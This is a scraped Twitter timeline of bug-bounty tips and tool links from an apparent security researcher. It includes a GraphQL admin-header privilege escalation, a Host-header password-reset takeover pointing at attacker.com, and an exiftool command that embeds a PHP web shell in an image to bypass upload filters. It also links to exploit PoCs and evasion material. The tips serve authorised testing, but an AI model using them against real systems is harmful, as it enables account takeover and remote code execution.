Pinned Tweet
40
252
757
Show this thread
Follow
Md Ismail Sojal
@0x0SojalSec
Cyber_Security_Researchers || 0SINT || Digital Forensics System Analysis II Pwn || || OLD Accounts Suspended ||
Md Ismail Sojal’s Tweets
Interesting Hasura GraphQL Framework Access Control Issue.
Found an authenticated endpoint "/script"
Added two headers to the existing request:
X-Hasura-Role: admin
X-Hasura-User-Id: 0
Was able to query as admin 😀
#bugbountytip #cybersec #infosec
2
27
59
When you're hacking, are you also checking the password reset functionality for simple bugs? 🐜
has been able to get some really quick ATO bugs by resetting the victim's password 🤯
#bugbounty #bugbountytips 👇
2
55
191
After The POC deleted, I re-uploaded it again.
( The first version Of POC was in Chinese).
PoC exploit code for CVE-2021-26855 in English
3
56
119
Show this thread
#bugbountytips
You don't need to write a bash script to fuzz multiple URLs with ffuf, you can simply do
ffuf -w urls.txt:URL -w wordlist:FUZZ -u URL/FUZZ
You can also omit the / if your URL list already has slashes ;)
8
74
273
Automatically Bypass 403 Pages (a ton of methods)
-
This script will test for URL bypasses, to reach a 40X protected page / endpoint.
-
Repo: github.com/laluka/bypass-
-
Creator:
-
#infosec #CyberSecurity #CTF #bugbountytips #bugbounty
14
235
679
A decade ago, when I started studying Information Technology seriously, I never thought I'd actually get into cybersecurity. I now have 4x as many kids, more facial hair, & more weight... but I also have my OSCP. #itsnevertoolate
10
10
246
Show this thread
Finally today I achieved P1 Warrior Level 1, In Sha Allah soon I'll achieve P1 Warrior level 2 😍 Thanks #ItTakesACrowd #bugbounty bugcrowd.com/HammadAhmed Keep pushing yourself to achieve your goals and one day you will 🫡😎
11
4
88
Black Friday is here!
Get your Cybersecurity deals before
they are gone for good. 👇
#Infosec #Thread #BlackFriday
2
13
49
Show this thread
Yay, I was awarded a $1,875 bounty on ! hackerone.com/imranhudaa
Zero click account takeover (total $3000 for this one)
#TogetherWeHitHarder
10
9
124
From now until 28/11/2022 23:59:59 UTC there is 37.33% off our membership!
Test your knowledge on our realistic web application "BARKER" which currently contains 170 vulnerabilities based on real findings from
bugbountyhunter.com/membership/
7
28
64
Read an awesome👏 blog:- “Interesting Stored XSS via meta data” by ⭐
#bugbounty #bugbountytips #infosec #cybersecurity
11
22
In android penetration testing while static analysis process you can find some awesome secrets/keys hardcoded here Are the most keywords I've used and I found a great keys
👇👇
#BugBounty
#bugbountytips
#bugbountytip
#bugbounty
5
14
58
Show this thread
Yay, I was awarded a $1,500 bounty on ! #TogetherWeHitHarder
Hard work Pays-off :) . Soon will do a writeup
#bugbounty #bugbountytips #cybersecuritytips #cybersecurity #hackerone #bug #API
5
7
119
Amazing evasion standoff between Windows 11 Defender and Windows 10 Defender. As one would expect Win 11 is far superior, but there's always something you can do to bypass detection 😉👇
#pentesting #redteaming #offensivesecurity
11
31
A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose.
github.com/emadshanab/Wor
#infosecurity #bugbountytips #cybersec
2
1
You can find deep domains without tools. like this simple dorks :🙃
site:*.site.com -www
site:*.*.site.com -www
site:*.*.*.site.com -www
#infosec #bugbountytip #cybersecuritytips
1
3
8
2
345
744
Easy | Rare AccountTakeover
1. Capture Password Reset request in Burp
2. Change the HostHeader to HOST: attacker.com
3. Victim triggers the Pw Reset link, Token will be captured in logs
4. Change the victim's password using the captured token.
#BugBountyTips #Infosec
4
26
69
- Open
private window
- Make sure proxy is configured (e.g., Burp Suite)
- Go out for a coffee and when you will be back ...
#infosec #cybersecuritytips #bugbountytip
1
3
Chasing in the wild has never been so easy #xss
github.com/gwen001/pentes
github.com/tomnomnom/qsre
github.com/gwen001/pentes
Btw does anyone know a way to speed up #phantomjs ? #javascript
9
192
458
Show this thread
Recon Profile For Open Redirection #infosec #cybersecuritytips #bugbountytip
gist.github.com/geekyrajnish/b
I made Cloudflare checker written in Go.
github.com/dwisiswant0/cf
The goal is that you don't need to do a port scan if it's proven that the IP is owned by Cloudflare.
#bugbountytips
4
73
186
Show this thread
Doing internet scanning research?
I have a list of IP ranges owned by top cloud providers, AWS, Azure, GCP, Godaddy, Linode, Rackspace.
All ready for internet research with masscan!
github.com/pry0cc/cloud-r
15
121
340
Show this thread
One liner to download all
data, unzip it and remove zip files:
gron chaos-data.projectdiscovery.io/index.json | grep URL | cut -d "=" -f 2 | sed 's/;*$//g' | xargs wget -nv && find -name '*.zip' -exec sh -c 'unzip -o -qq -d "${1%.*}" "$1"' _ {} \; && rm -rf *.zip
#infosec #cybersec
2
2
Search engines for hackers:
censys.io
shodan.io
viz.greynoise.io/table
zoomeye.org
fofa.so
onyphe.io
app.binaryedge.io
hunter.io
wigle.net
22
788
2,326
TL;DR: One-click pure logic chain code execution in LibreOffice (CVE-2020-12803)
GIF
13
22
Find out what websites are built:
from console !
cat urls-alive.txt | parallel -j 50 "echo {}; python3 main.py analyze --url {}" #bugbountytips #infosec #cybersecuritytips #bugbountytip
Alert !!! This Github Repository contains malicious actions
payload : base64 encoded .
github.com/swiper/CVE-202
Please be aware before using new CVE exploits .
#bugbountytips #bugbounty
2
21
40
3
15
Just FYI my content discovery file is:
gist.github.com/jhaddix/b80ea6
My subdomain enumeration file is:
gist.github.com/jhaddix/f64c97
My github dork section of hunter.sh is:
gist.github.com/jhaddix/77253c
Enjoy!
20
557
1,366
The Ultimate GitHub Dorks Listed : by
>github.com/obheda12/GitDo
#cybersecuritytips #infosec #bugbountytip
1
3
Bypass File Upload Filtering :
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
3
8
Accessing Unauthorized Directories. Various tips it's collected
#bugbountytip #cybersecuritytips #infosec
2
19
50
